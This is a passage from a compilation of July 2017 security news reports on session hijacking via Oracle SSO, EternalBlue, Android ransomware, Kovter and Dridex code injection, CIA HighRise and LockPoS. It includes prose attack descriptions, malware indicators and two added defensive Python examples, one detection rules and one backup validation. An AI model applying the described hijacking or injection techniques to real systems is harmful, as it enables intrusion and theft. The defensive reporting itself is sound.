For that, the user would need to be tricked into clicking a link and logging in. However, since the user is required to log in on the real portal, that shouldn’t raise suspicion. If the user is logged in, the cookie would be retrieved without issues and without the victim noticing it.

“We found hundreds of hundreds of high profile organization with the same misconfiguration, all of them exposed against session hijacking. We analyzed 100 high profile domains and only 1 was properly secured against this attack,” Ahmed said.

An attacker knowing such domains could send phishing emails and lure victims into clicking the link. The attacker does not have to set up another website to capture credentials, since the victim is redirected to the real login page, where they are asked to submit their credentials.

The server responds with an HTTP 302 redirect pointing to a malicious domain, which steals the user's cookie and uses it to log in to their account. The web server then sends the victim a redirect with the same cookie information to the appropriate domain, meaning that both the victim and the attacker are logged in, each in their own independent session.

According to the researcher, when they contacted Oracle to point out the configuration issue, the company informed them that the problem had been already addressed through a feature called SSODomains. However, if SSODomains isn’t defined, it “effectively means you'll be able to get valid session for any domain,” the security researcher said.

According to Ahmed, the NIST CVSSv3 calculator would give the vulnerability an overall score of 9.3, meaning that it is a Critical issue.


Free Scanner Finds 50,000 EternalBlue-Vulnerable Systems

13.7.2017 securityweek Safety

More than 50,000 computers vulnerable to the NSA-linked EternalBlue exploit were found by a free vulnerability scanner in recent weeks.

Dubbed Eternal Blues, the tool was designed to provide network administrators with visibility into the EternalBlue-vulnerable machines in their networks, but without actually exploiting the flaw. In the wake of WannaCry, NotPetya, and other global infections leveraging the NSA-linked exploit, knowing whether a network is vulnerable or not is certainly a good idea.

According to Elad Erez, the security researcher who built the scanner, data collected through Eternal Blues over the past couple of weeks reveals that more than 50,000 scanned hosts are vulnerable to the exploit.

Erez also warns that sometimes all it takes is a single vulnerable machine to compromise an entire network. Using Eternal Blues, the administrator(s) of a network with around 10,000 hosts found the only two machines that were still vulnerable, thus securing the entire environment.

As of July 12, over 8 million IPs were scanned using Eternal Blues, most of which (1.5 million) are located in France. Vulnerable machines were found in around 130 countries and the top 3 countries “had more than 30,000 vulnerable hosts altogether,” the security researcher says.

Over half (53.82%) of the vulnerable hosts still have SMBv1 enabled, the researcher also discovered. Moreover, he notes that 1 out of 9 hosts in a network is vulnerable to EternalBlue.

Although Eternal Blues found only around 50,000 vulnerable systems, Erez warns that the real number is much higher. Issues with the scanner prevented it from correctly reporting the number of vulnerable hosts. The researcher addressed those in a version released on July 2, but did not take previous findings into account when presenting the above numbers.

According to Erez, however, awareness on EternalBlue appears to have increased. The mere fact that admins are using the scanner is proof of that, he says.

To keep systems and networks secure, admins should apply the latest patches, perform periodic assessments of risks in their networks, and disable SMBv1, the researcher says. He also advises enabling automatic updates on Windows systems.

“Please, don’t be mistaken – recent ransomware attacks are the ones that made all the buzz, since they actually tell you when they hit you. I believe there are many more EternalBlue-based attacks which remain off the radar and are still unknown to,” the researcher points out.


New Ransomware Threatens to Send Your Internet History & Private Pics to All Your Friends
13.7.2017 thehackernews
Ransomware

After WannaCry and Petya ransomware outbreaks, a scary (but rather creative) new strain of ransomware is spreading via bogus apps on the Google Play Store, this time targeting Android mobile users.
Dubbed LeakerLocker, the Android ransomware does not encrypt files on the victim's device like traditional ransomware; instead, it secretly collects personal images, messages and browsing history and threatens to share them with the victim's contacts if they don't pay $50 (£38).
Researchers at security firm McAfee spotted the LeakerLocker ransomware in at least two apps — Booster & Cleaner Pro and Wallpapers Blur HD — in the Google Play Store, both of which have thousands of downloads.
To evade detection of their malicious functionality, the apps initially contain no malicious payload and function like legitimate apps.
But once installed by users, the apps load malicious code from their command-and-control server, which instructs them to collect a large amount of sensitive data from the victim's phone — thanks to victims blindly granting unnecessary permissions during installation.
The LeakerLocker ransomware then locks the home screen and displays a message that contains details of the data it claims to have stolen and holds instructions on how to pay the ransom to ensure the information is deleted.
The ransom message reads:
All personal data from your smartphone has been transferred to our secure cloud.
In less than 72 hours this data will be sent to every person on your telephone and email contacts list. To abort this action you have to pay a modest ransom of $50 (£38).
Please note that there is no way to delete your data from our secure but paying for them. Powering off or even damaging your smartphone won't affect your data in the cloud.
Although the ransomware claims that it has taken a backup of all of your sensitive information, including personal photos, contact numbers, SMS', calls and GPS locations and browsing and correspondence history, researchers believe only a limited amount of data on victims is collected.
According to researchers, LeakerLocker can read a victim's email address, random contacts, Chrome history, some text messages and calls, take a picture from the camera, and read some device information.

All the above information is randomly chosen to display on the device screen, which is enough to convince the victims that lots of data have been copied.
Both malicious apps have since been removed by Google from the Play Store, but it is likely that hackers will try to smuggle their software into other apps.
If you have installed any of the two apps, uninstall it right now.
But if you are hit by the ransomware and are worried about your sexy selfies and photographs being leaked to your friends and relatives, you might be thinking of paying a ransom.
Do not pay the Ransom! Doing so motivates cyber criminals to carry out similar attacks, and there is also no guarantee that the stolen information will be deleted by the hackers from their server and will not be used to blackmail victims again.


Researcher Claims Samsung's Tizen OS is Poorly Programmed; Contains 27,000 Bugs!
13.7.2017 thehackernews
Vulnerability

A researcher has claimed that Samsung's Tizen operating system that runs on millions of Samsung products is so poorly programmed that it could contain nearly 27,000 programming errors, which could also lead to thousands of vulnerabilities.
Tizen is a Linux-based open-source operating system backed by Intel and Samsung Electronics, which has been in development since early 2012 and designed for smartphones, tablets, smart TVs, smart watches, cameras and PCs.
According to Andrey Karpov — founder of Russia-based company Program Verification Systems that made PVS-Studio, a static code analyzer tool that helps programmers to find and fix bugs in their source codes — his team has discovered hundreds of errors in Tizen project using PVS-Studio.
Samsung's Tizen operating system, written in C and C++, currently has 72.5 million lines of source code, of which Karpov's team analysed some randomly chosen modules, i.e. 3.3% of the entire project, and found nearly 900 errors.
"If we extrapolate the results, we will see that our team is able to detect and fix about 27000 errors in Tizen," Karpov says.
In April this year, Israeli researcher Amihai Neiderman called Tizen "the worst code I've ever seen" after he examined the operating system and discovered as many as 40 zero-day vulnerabilities in Tizen code.
After finding almost a thousand bugs in Tizen code, Karpov contacted Samsung to pitch for the sale of static analyser PVS-Studio software, but Youil Kim from Samsung declined the offer.
According to a mail exchanged between Karpov and Kim, Samsung is already using the SVACE technology (Security Vulnerabilities and Critical Errors Detector) to detect potential vulnerabilities and errors in source code of applications created for Tizen.
"We are already aware that another tool can find additional defects. However, we don't agree with that Tizen has 27,000 defects that should be fixed. As you know, many of static analysis warnings are often considered as insignificant issues," Kim added.
The Tizen operating system already runs on nearly 30 million smart TVs, Galaxy Gear-branded watches, cameras, home appliances and some of Samsung's smartphones sold in countries like Russia, India and Bangladesh.
Samsung even plans to have some 10 million Tizen smartphones on the market by the end of this year.
So, if claims made by the researcher are true — which was also acknowledged by a Samsung representative to some extent — the company should shift their focus mainly towards the security of the operating system in Tizen 4.0, which is due for release in September.


Windows 10 Boosts Protections Against Code Injection Attacks

13.7.2017 securityweek Attack

Enhancements in Windows 10 Creators Update include improvements in Windows Defender Advanced Threat Protection (Windows Defender ATP) to keep users protected from threats such as Kovter and Dridex Trojans, Microsoft says.

Specifically, Windows Defender ATP in Creators Update can detect code injection techniques associated with these threats, such as process hollowing and atom bombing. Already used by various other threats, these methods enable malware to infect computers and engage in various nefarious activities while remaining stealthy.

Process hollowing is a technique where a threat spawns a new instance of a legitimate process, after which it replaces the legitimate code with that of the malware. While other injection techniques add a malicious feature to a legitimate process, hollowing results in a process that looks legitimate but is primarily malicious.

There are various threats using process hollowing, with Kovter, a four-year old click-fraud Trojan that adopted a fileless infection model last year and which was recently associated with ransomware such as Locky, being the most popular. In November last year, Kovter was found responsible for a massive spike in new malware variants.

Delivered mainly through phishing emails, Kovter hides most of its malicious components via registry keys, then uses native applications to execute the code and perform injection. For persistence, it adds shortcuts (.lnk files) to the startup folder or new keys to the registry.

The malware adds two registry entries to have its component file opened by the legitimate program mshta.exe. The component extracts an obfuscated payload from a third registry key and a PowerShell script is used to execute another script that injects shellcode into a target process. Through this shellcode, Kovter uses process hollowing to inject malicious code into legitimate processes.

Atom bombing is a rather new code injection method, based on a Windows vulnerability that can’t be patched, and which can be used by an attacker who has already compromised the targeted machine. The technique relies on malware writing malicious code to the global atom table and using asynchronous procedure calls (APC) to retrieve the code and insert it into the memory of the target process.

Dridex, a threat first spotted in 2014, was an early adopter of atom bombing. Mainly distributed via spam emails, Dridex was designed to steal banking credentials and sensitive information, as well as to disable security products and provide attackers with remote access to victim computers. The threat remains stealthy and persistent by avoiding common API calls associated with code injection techniques.

When executed on the victim’s system, the malware looks for a target process and ensures user32.dll is loaded by this process, as it needs the DLL to access the required atom table functions. Next, the malware writes its shellcode to the global atom table, then adds NtQueueApcThread calls for GlobalGetAtomNameW to the APC queue of the target process thread to force it to copy the malicious code into memory.

“Kovter and Dridex are examples of prominent malware families that evolved to evade detection using code injection techniques. Inevitably, process hollowing, atom bombing, and other advanced techniques will be used by existing and new malware families,” John Lundgren, Windows Defender ATP Research Team, explains.

Windows Defender ATP Creators Update, he adds, includes function calls and statistical models that can detect various malicious injection techniques and better expose covert attacks. According to Lundgren, Microsoft has already tested these capabilities against real-world examples of malware families employing process hollowing and atom bombing, among other methods.
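The Kovter chain described above (a component file opened by mshta.exe, PowerShell launched from it, and a .lnk dropped into the Startup folder for persistence) leaves behaviour visible in ordinary process- and file-creation telemetry even when the payload itself lives in the registry. The Python below is an added example written for this page, not Windows Defender ATP's detection logic and not Microsoft's code; the event schema, the file paths, the sample events and the rule names are all constructed for the illustration, and the rules are coarse heuristics rather than a tuned detection.

```python
"""Added example (not Windows Defender ATP's detection logic): simple rules over
constructed process- and file-creation events for the Kovter chain the article
describes: mshta.exe opening a non-HTA component file, PowerShell spawned from
mshta.exe, and a .lnk dropped into the Startup folder. The event schema, the
paths and the rule names are assumptions made for this illustration."""
import ntpath

# Lower-cased fragment of the per-user Startup folder path (assumption: roaming profile layout).
STARTUP_MARKER = r"\microsoft\windows\start menu\programs\startup"

# Constructed sample telemetry: one Kovter-like chain plus two benign events.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 2200, "ppid": 1000, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"type": "process", "pid": 4100, "ppid": 2200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\alice\AppData\Local\Temp\component.a1b2"'},
    {"type": "process", "pid": 4120, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden"},
    {"type": "file", "pid": 4120,
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"type": "process", "pid": 5000, "ppid": 2200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    {"type": "file", "pid": 5000, "path": r"C:\Users\alice\Documents\notes.txt"},
]


def _basename(image):
    """Case-folded file name of a Windows image path; ntpath works on any host OS."""
    return ntpath.basename(image).lower()


def _mshta_target(cmdline):
    """First argument handed to mshta.exe, with surrounding quotes removed."""
    parts = cmdline.split(maxsplit=1)
    return parts[1].strip().strip('"') if len(parts) > 1 else ""


def find_alerts(events):
    """Return (rule, pid) tuples for events matching the constructed rules, in event order."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    alerts = []
    for e in events:
        if e["type"] == "process":
            name = _basename(e["image"])
            parent = procs.get(e["ppid"])
            pname = _basename(parent["image"]) if parent else ""
            # Rule 1: the script host handing off to PowerShell, as in the Kovter chain.
            if name == "powershell.exe" and pname == "mshta.exe":
                alerts.append(("mshta_spawns_powershell", e["pid"]))
            # Rule 2: mshta.exe opening a file that is not an HTA/HTML document.
            if name == "mshta.exe":
                target = _mshta_target(e["cmdline"])
                if target and not target.lower().endswith((".hta", ".htm", ".html")):
                    alerts.append(("mshta_unusual_component", e["pid"]))
        elif e["type"] == "file":
            # Rule 3: shortcut persistence in the Startup folder.
            path = e["path"].lower()
            if path.endswith(".lnk") and STARTUP_MARKER in path:
                alerts.append(("startup_lnk_persistence", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in find_alerts(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Each rule on its own will fire on some legitimate administration activity; the value of the three together is that they trigger on consecutive steps of the same chain from the same process tree, which is what an analyst would pivot on. Hollowing itself (the replacement of a suspended process's image) is not observable from these events and needs memory-level telemetry, which is the capability the article attributes to the Creators Update.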


Democracy at Risk from Poor Cybersecurity, Foreign Interference: Survey

13.7.2017 securityweek BigBrothers

Survey Shows Distinct Voter Concern for Elections and Cybersecurity

For more than a year, a single thread has dominated American news: foreign interference in US elections. It started in June 2016 in the run-up to the 2016 presidential election, when the Democratic National Committee (DNC) announced it had been hacked, and CrowdStrike accused Russia-based Cozy Bear (APT 29).

Since then, the ramifications have rarely been out of the news. In October 2016 the U.S. government formally accused Russia of being behind the cyberattacks, and by December it became known that the CIA believed that "Russia intervened in the 2016 election to help Donald Trump win the presidency, rather than just to undermine confidence in the U.S. electoral system," The Washington Post reported.

Since then, emphasis has switched to questioning the extent to which the Trump electoral team may or may not have known about or colluded with Russia in order to win the election; and whether it has or has not attempted to hinder or subvert subsequent law enforcement investigations. This has continued throughout 2017 until Wednesday this week when Rep. Brad Sherman (D-Calif.) formally introduced an article of impeachment against President Trump.

The article of impeachment revolves around Trump's dismissal of FBI director James Comey allegedly to hinder the FBI's investigation into former National Security Advisor, General Michael Flynn. "In all of this, Donald John Trump has acted in a manner contrary to his trust as President and subversive of constitutional government, to the great prejudice of the cause of law and justice and to the manifest injury of the people of the United States."

The huge and apparently unending ramifications of what started as just another cyber hack has caused cybersecurity firm Carbon Black to wonder what effect the cyber element has had on the American electorate. In June 2017, it conducted a nationwide survey (PDF) of 5,000 eligible U.S. voters, with particular reference to the upcoming midterm 2018 elections.

In an associated blog post Carbon Black CEO Patrick Morley commented, "In perhaps the most startling revelation from the survey, 1 in 4 voters said they will consider not voting in upcoming elections over cybersecurity fears."

In reality, this figure is easily covered by existing non-voters. Only approximately 57.9% of voters voted in the 2016 election, down less than 1% from the 58.6% who voted in 2012. So, while 25% of voters now say they may not vote in the midterms, this may have no effect on actual voter turnout.

A second area where the obvious conclusion may not be the accurate conclusion can be seen in 'voter perception on election influence'. According to the survey, "47% of voters said they believe the 2016 U.S. election was influenced by foreign entities." However, there could be a strong element of 'sore loser' in these figures. There is an aspect of tribalism in political affiliation -- some people will always vote for one particular party simply because of tribal affiliations.

It is estimated that 48% of the electorate voted for Clinton (slightly more than the estimated 46% who voted Trump). There will be a strong incentive for the losing 48% to blame external causes on their loss -- and that could account for a large proportion of the 47% of responding voters who told Carbon Black that the result was influenced by foreign entities.

Despite not being able to definitively relate current sentiment to a past or future threat against electoral democracy, the Carbon Black survey nevertheless shows distinct voter concern for elections and cybersecurity. Several of the survey queries are unambiguous, and the results can be taken at face value. Forty-five percent of voters believe that Russia poses the biggest cybersecurity risk to U.S. elections. Of the remaining 55%, "20% said the United States itself; 17% said North Korea; 11% said China; and 4% said Iran. (3% answered 'other.')" notes the report.

Fifty-four percent of respondents "said the NSA leaks negatively impacted their trust in the U.S. election system to keep data safe;" and 44% "said they believe Russia will 'Be back' to influence future elections."

Carbon Black concludes, "Cyberattacks against our elections seed doubt in democracy. The idea that even a single voter is willing to forfeit their vote in fear of a cyberattack is startling. The fact that 1 in 4 voters said they would be willing to do so speaks volumes about how deeply this doubt has penetrated. The alleged cyberattacks surrounding the 2016 elections were a clarion call that foreign entities are motivated to disrupt U.S. elections." More starkly, it adds, "Our democracy is at risk."

Reality is probably not as extreme as this suggests. Political sentiment polling is very difficult, and Carbon Black has failed to eliminate 'other causes' in some of its questions. It might, for example, have been better to question 5,000 eligible voters that had actually voted in 2016 to get a more accurate picture of future voting intentions.

Nevertheless, it is clear that there is strong voter concern over the future of elections and cybersecurity. The report makes five proposals designed "to help restore voter confidence." The first is to implement stronger cybersecurity protection for online registration systems and voter databases. The second is to limit (or discontinue) the use of electronic voting machines. The third is to create an auditable paper trail of votes in every state and precinct. The fourth is to prohibit online voting.

The fifth is arguably the most important. In January 2017, then U.S. Homeland Security Secretary Jeh Johnson said, "I have determined that election infrastructure in this country should be designated as a subsector of the existing Government Facilities critical infrastructure sector. Given the vital role elections play in this country, it is clear that certain systems and assets of election infrastructure meet the definition of critical infrastructure, in fact and in law."

In its fifth recommendation, Carbon Black now calls for the government to "commit the same urgency and resources to protecting its elections as it does for 'traditional' critical infrastructure."


Trend Micro Patches Flaws in Deep Discovery Product

13.7.2017 securityweek Vulnerability

Trend Micro has released a critical patch for its Deep Discovery Director product to address several vulnerabilities that can be combined to achieve arbitrary command execution.

Deep Discovery Director is a Linux-based on-premises management platform that allows organizations to centralize the deployment of product updates and upgrades, Virtual Analyzer images, and configurations to Deep Discovery products.

Researchers at Core Security discovered in late May that version 1.1 of the product is affected by three potentially serious vulnerabilities, including command injection, hardcoded password and improper backup validation issues. Trend Micro addressed the bugs this week and published a security bulletin to notify customers.

According to Core Security, configuration and database backup archives are not signed or validated. They are encrypted, but the same cryptographic key is used across all virtual appliances.

An attacker with access to the Deep Discovery Director web console can exploit these weaknesses to create specially crafted backup archives that will be loaded by the application. The backup restoration process for accounts used to access the pre-configuration console is affected by a command injection vulnerability, allowing the attacker to leverage the malicious backup archive to execute arbitrary commands and spawn a root shell.
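The advisory's three weaknesses are the absence of three controls: a key that is not shared across appliances, an authentication tag checked before any byte of the archive is trusted, and restore-time values that never reach a shell. The Python below is an added example written for this page, not Trend Micro's code; the HMAC-based key derivation, the JSON archive layout, the account-name pattern and the illustrative `useradd` command are assumptions, and the sample secret is constructed.

```python
"""Added example (not Trend Micro's code): what the missing controls in the
Deep Discovery Director backup flow look like when present: a per-appliance
key, an authentication tag verified before any field of the archive is used,
and account names validated and passed as argv rather than through a shell.
The key-derivation scheme, the JSON layout and the useradd command are
assumptions made for this illustration."""
import hashlib
import hmac
import json
import re

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes
MASTER_SECRET = b"constructed-master-secret-not-a-real-key"  # constructed, not a real key
# Strict allow-list for console account names; fullmatch() rejects trailing newlines.
ACCOUNT_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def appliance_key(master, appliance_id):
    """Derive a key bound to one appliance, so an archive sealed on one box is rejected on another."""
    return hmac.new(master, appliance_id.encode(), hashlib.sha256).digest()


def seal_backup(payload, key):
    """Serialize the backup and prepend an HMAC-SHA256 tag over the serialized bytes."""
    body = json.dumps(payload, sort_keys=True).encode()
    return hmac.new(key, body, hashlib.sha256).digest() + body


def is_authentic(blob, key):
    """Constant-time check of the tag; a wrong key or any modified byte fails."""
    tag, body = blob[:TAG_LEN], blob[TAG_LEN:]
    return hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest())


def open_backup(blob, key):
    """Parse the archive only after it authenticates; raise otherwise."""
    if not is_authentic(blob, key):
        raise ValueError("backup archive failed authentication")
    return json.loads(blob[TAG_LEN:])


def account_name_ok(name):
    """True only for names that match the allow-list pattern in full."""
    return ACCOUNT_RE.fullmatch(name) is not None


def restore_accounts_argv(payload):
    """Build argv lists for the account restore step; no string from the archive reaches a shell."""
    commands = []
    for account in payload.get("accounts", []):
        name = account["name"]
        if not account_name_ok(name):
            raise ValueError(f"rejected account name: {name!r}")
        commands.append(["useradd", "--no-create-home", name])  # illustrative command
    return commands


if __name__ == "__main__":
    key = appliance_key(MASTER_SECRET, "dd-director-001")
    archive = seal_backup({"version": "1.1", "accounts": [{"name": "admin"}]}, key)
    print(is_authentic(archive, key), restore_accounts_argv(open_backup(archive, key)))
```

Authentication here is separate from encryption on purpose: the archives in the advisory were encrypted, and encryption alone does not stop a holder of the shared key from producing a crafted archive that the restore code accepts. Deriving the key from an appliance identifier also means a key recovered from one appliance does not validate archives for another, which is the cross-appliance exposure the shared key created.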

Core Security has published an advisory that contains technical details for each of the vulnerabilities and how they can be combined to achieve arbitrary command execution.

Trend Micro has classified the vulnerabilities as medium severity and pointed out that an attacker requires physical or remote access to the affected machine in order to exploit the flaws.

This is not the only critical patch released in recent months by Trend Micro for a Deep Discovery product. In March, the company informed customers of Deep Discovery Email Inspector (DDEI) 2.5.1 of critical vulnerabilities that can be exploited for remote code execution.

The security holes were reported to Trend Micro via the Zero Day Initiative (ZDI), which published separate advisories for each of the issues.


Wikileaks: CIA HighRise Android malware used to intercept and redirect SMSs
13.7.2017 securityaffairs BigBrothers

Wikileaks released the documentation for HighRise, an Android app used by the CIA to intercept and redirect SMS messages to a CIA-controlled server.
WikiLeaks just published a new batch of documents related to another CIA hacking tool, dubbed HighRise, as part of the Vault 7 series released in partnership with media partners.

The tool is an Android application used by US intelligence agents to intercept and redirect SMS messages to a CIA-controlled server.

Below is the list of features implemented by the Android malware:

Proxy “incoming” SMS messages received by HighRise host to an internet LP
Send “outgoing” SMS messages via the HighRise host
Provide a communications channel between the HighRise field operator & the LP
TLS/SSL secured internet communications
“HighRise is an Android application designed for mobile devices running Android 4.0 to 4.3. HighRise provides a redirector function for SMS messaging. There are a number of IOC tools that use SMS messages for communication and HighRise is a SMS proxy that provides greater separation between devices in the field (“targets”) and the listening post.” reads the manual.

According to a user manual leaked by Wikileaks, the malicious code only works on Android versions from 4.0 through 4.3 (Android Ice Cream Sandwich and Jelly Bean), which currently account for 8.8 percent of all Android devices on the market.

However, since the document is dated December 2013, it is likely that the CIA has updated the tool in the meantime to target newer versions of the Android OS.

The HighRise tool is packaged inside an app named TideCheck (tidecheck-2.0.apk, MD5: 05ed39b0f1e578986b1169537f0a66fe).


The tool must be installed manually by CIA agents on the target device and needs to be run manually at least once.

“Therefore, the HighRise application first must be manually run once before it will automatically run in the background or after a reboot. As a consequence, the HighRise application now shows up in the list of installed apps so it can be started by the HighRise operator. ” continues the manual.

When running the tool for the first time, CIA cyber spies must enter the special code “inshallah” (“God willing” in Arabic) to access its settings.

Once the code has been entered and the software is successfully activated, HighRise will run in the background listening for events. The hacking tool will automatically start every time the phone is powered on.

“Once activated, HighRise will run in the background listening for events. It will also automatically start when the phone is powered on. Activating HighRise multiple times will have no adverse effects.” continues the manual.

Below is the list of releases published by WikiLeaks since March:

HighRise – 13 July, 2017
BothanSpy and Gyrfalcon – 06 July, 2017
OutlawCountry – 30 June, 2017
ELSA malware – 28 June, 2017
Cherry Blossom – 15 June, 2017
Pandemic – 1 June, 2017
Athena – 19 May, 2017
AfterMidnight – 12 May, 2017
Archimedes – 5 May, 2017
Scribbles – 28 April, 2017
Weeping Angel – 21 April, 2017
Hive – 14 April, 2017
Grasshopper – 7 April, 2017
Marble Framework – 31 March, 2017
Dark Matter – 23 March, 2017


Verizon Downplays Leak of Millions of Customer Records

13.7.2017 securityweek Incident

The personal details of millions of Verizon customers were exposed online due to a misconfigured Amazon Web Services (AWS) S3 bucket operated by a third-party vendor, but the telecoms giant has downplayed the incident.

Cyber resilience firm UpGuard reported on Wednesday that its researchers discovered an unprotected AWS S3 bucket containing information on as many as 14 million Verizon customers, including names, addresses, phone numbers, PINs used for identity verification purposes, customer satisfaction data, and service purchases.

The data, which appears to represent daily logs collected over the first six months of 2017, was not exposed by Verizon itself, but by NICE Systems, an Israel-based partner that provides call center services. UpGuard reported the leak to Verizon on June 13, but the exposed database was only protected on June 22.

“Beyond the sensitive details of customer names, addresses, and phone numbers—all of use to scammers and direct marketers—the prospect of such information being used in combination with internal Verizon account PINs to takeover customer accounts is hardly implausible. To do so would enable impersonators to tell Verizon call center operators to do whatever was wished of them,” UpGuard said in a blog post.

Verizon data leak

In a statement published on its corporate website, Verizon downplayed the incident, claiming that the details of only 6 million unique customers were exposed. The company blamed the leak on human error, and pointed out that no one other than UpGuard had accessed the unprotected cloud storage area.

“The overwhelming majority of information in the data set had no external value, although there was a limited amount of personal information included, and in particular, there were no Social Security numbers or Verizon voice recordings in the cloud storage area,” Verizon said.

“To further clarify, the data supports a wireline portal and only includes a limited number of cell phone numbers for customer contact purposes. In addition, to the extent PINs were included in the data set, the PINs are used to authenticate a customer calling our wireline call center, but do not provide online access to customer accounts,” the company added.

Experts believe this is a serious incident, even if no one else downloaded the data from the cloud storage.

“Sure, a mid-air miss is better than an air flight disaster, but neither should ever happen,” John Gunn, chief marketing officer for VASCO Data Security, told SecurityWeek. “Data such as this can be used by hackers for all types of attacks, especially phishing attacks, by giving them legitimacy in the mind of the victim. We saw this recently with the DocuSign breach and the subsequent successful attacks against their users.”

Willy Leichter, vice president of marketing at Virsec, believes “this will be a heated board-level issue for a $1 billion company like Nice, and a $125 billion-plus company like Verizon.”

“If the European General Data Protection Regulation (GDPR) was in effect (it is starting in May 2018) there could be a fine as large as $5 billion (4% of annual revenue) for this single incident,” Leichter said.


US Government limits purchase of Kaspersky Lab solutions amid concerns over Russia ties
13.7.2017 securityaffairs BigBrothers

The US General Services Administration announced that the security firm Kaspersky Lab has been removed from its list of approved vendors.
The US government bans Kaspersky solutions amid concerns over Russian state-sponsored hacking. Federal agencies will not buy software from Kaspersky Lab due to its alleged links to the Russian intelligence services.

This week, a Bloomberg News report claimed that internal company emails show Kaspersky has a close relationship with Russia's FSB intelligence service.

The General Services Administration (GSA), which is the organization that handles federal government purchasing contracts, announced that cyber security firm Kaspersky Lab has been removed from the list of approved vendors.

“GSA’s priorities are to ensure the integrity and security of US government systems and networks and evaluate products and services available on our contracts using supply chain risk management processes,” reads the statement issued by the General Services Administration.

The decision does not surprise the IT security industry: US intelligence and government officials have expressed concerns about the adoption of Kaspersky software several times.

It is important to highlight that the ban is not total: government agencies will still be able to use Kaspersky software purchased outside the GSA contract process.

According to Reuters,

The company said in a statement to AFP that it had not received any updates from the GSA or any other U.S. government agency regarding its vendor status.

“Kaspersky Lab has no ties to any government, and the company has never helped, nor will help, any government in the world with its cyberespionage efforts,” the company said.

It added that it had been “caught in the middle of a geopolitical fight where each side is attempting to use the company as a pawn in their political game.”

Kaspersky added that “the company is being unjustly accused without any hard evidence to back up these false allegations.”

Kaspersky on Tuesday published a statement in response to the Bloomberg report.

“While the U.S. government hasn’t disclosed any evidence of the ties, internal company emails obtained by Bloomberg Businessweek show that Kaspersky Lab has maintained a much closer working relationship with Russia’s main intelligence agency, the FSB, than it has publicly admitted.”

“Actually, the reported emails show no such link, as the communication was misinterpreted or manipulated to try to make the media outlet’s narrative work. Kaspersky Lab is very public about the fact that it assists law enforcement agencies around the world with fighting cyberthreats, including those in Russia, by providing cybersecurity expertise on malware and cyberattacks.” states Kaspersky.

“Kaspersky Lab regularly cooperates with law enforcement agencies, industry peers and victims of cybercrime.”

In May, the Senate Armed Services Committee passed a defense spending policy bill that would ban Kaspersky products from use in the US military. The decision was taken a day after the FBI interviewed several of the company’s U.S. employees at their private homes as part of a counterintelligence investigation into its operations.

“In May senior U.S. intelligence officials said in testimony before the Senate Intelligence Committee that they were reviewing government use of software from Kaspersky Lab.” reported Reuters.

“Lawmakers raised concerns that Moscow might use the firm’s products to attack American computer networks, a particularly sensitive issue given allegations by U.S. intelligence agencies that Russia hacked and leaked emails of Democratic Party political groups to interfere in the 2016 presidential election campaign. Russia denies the allegations.”


New PoS Malware LockPoS emerges in the threat landscape
13.7.2017 securityaffairs Virus

A newly discovered Point of Sale (PoS) malware dubbed LockPoS appeared in the wild and it is being delivered through the Flokibot botnet.
Arbor Networks security researchers warn that the new Point of Sale (PoS) malware, dubbed LockPoS, is being delivered via a dropper that is manually loaded and executed on the targeted systems.

LockPoS uses the same command and control (C&C) infrastructure that Flokibot used against Brazilian users.

Floki Bot is a banking Trojan based on Zeus that has been sold in the cybercrime underground since September 2016. The malware was developed from the Zeus source code leaked in 2011 and is offered for $1,000 worth of bitcoins.

The experts from Flashpoint who discovered it in the wild in December speculated that Floki Bot has a Brazilian origin: the threat actor behind the malware used the “flokibot” moniker and communicated in Portuguese, and the malware targeted Brazilian IPs and domains and systems whose default language was set to Portuguese.

LockPoS appears to have been compiled in late June and uses a dropper that injects the malicious code directly into the explorer.exe process.

The malware has to be manually loaded and executed; the dropper then extracts a resource file from itself that contains multiple components, which are injected into explorer.exe and act as a second-stage loader. Next, the malicious code decrypts, decompresses, and loads the final LockPoS payload.

LockPoS implements a regular “registry run” method for persistence and obfuscates important strings using XOR and a key of “A”.

“LockPoS uses the regular “registry run” method for persistence. It obfuscates important strings using XOR and a key of “A”. An initial configuration (which includes the C2 URL) is stored unencrypted as a resource named “XXXX”:” states the analysis.

“C2 communications are via HTTP and using a very telling User-Agent. “

The malware communicates with the C&C server via HTTP; once it has infected a machine, it sends back several pieces of information, including the username, computer name, bot ID, bot version (1.0.0.6), CPU, physical memory, display devices, Windows version and architecture, and the MD5 hash of the currently running sample.

“The malware’s PoS credit card stealing functionality works similarly to other PoS malware: it scans the memory of other running programs looking for data that matches what credit card track data looks like. Here’s a snippet of the matching function,” continues the analysis.

LockPoS

LockPoS has been distributed via a Flokibot botnet, likely by the same threat actor, which is focused on Brazilian users.

Experts highlighted that the same C&C, treasurehunter[.]at, was used in another PoS malware campaign spotted by FireEye last year and tracked as TREASUREHUNT.

Arbor Networks explained that LockPoS is a different malware family from TREASUREHUNT.

“One thing to note about the analyzed C2 server (treasurehunter[.]at) is that there is a name overlap with another PoS malware that FireEye wrote about in 2016 called TREASUREHUNT. Based on their research on its C2 communications, panel, and other IoCs it looks like LockPoS and TREASUREHUNT are separate families.”

“It is currently unclear whether LockPoS is an exclusive malware associated with one threat actor or whether it will be sold on underground forums like Flokibot was,” continues the analysis.


More than 14 Million Verizon Customers’ records exposed by a third party firm
13.7.2017 securityaffairs Incident

Data belonging to 14 million U.S.-based Verizon customers has been exposed on an unprotected AWS server by a partner of the telecommunications company.
The well-known security expert Chris Vickery, UpGuard director of cyber risk research, has made another disconcerting discovery: the personal details of more than 14 million US customers were exposed after the third-party vendor NICE left the sensitive records on an unprotected AWS server.
NICE Systems is an Israeli firm that offers several solutions for intelligence agencies, including telephone voice recording, data security, and surveillance systems.

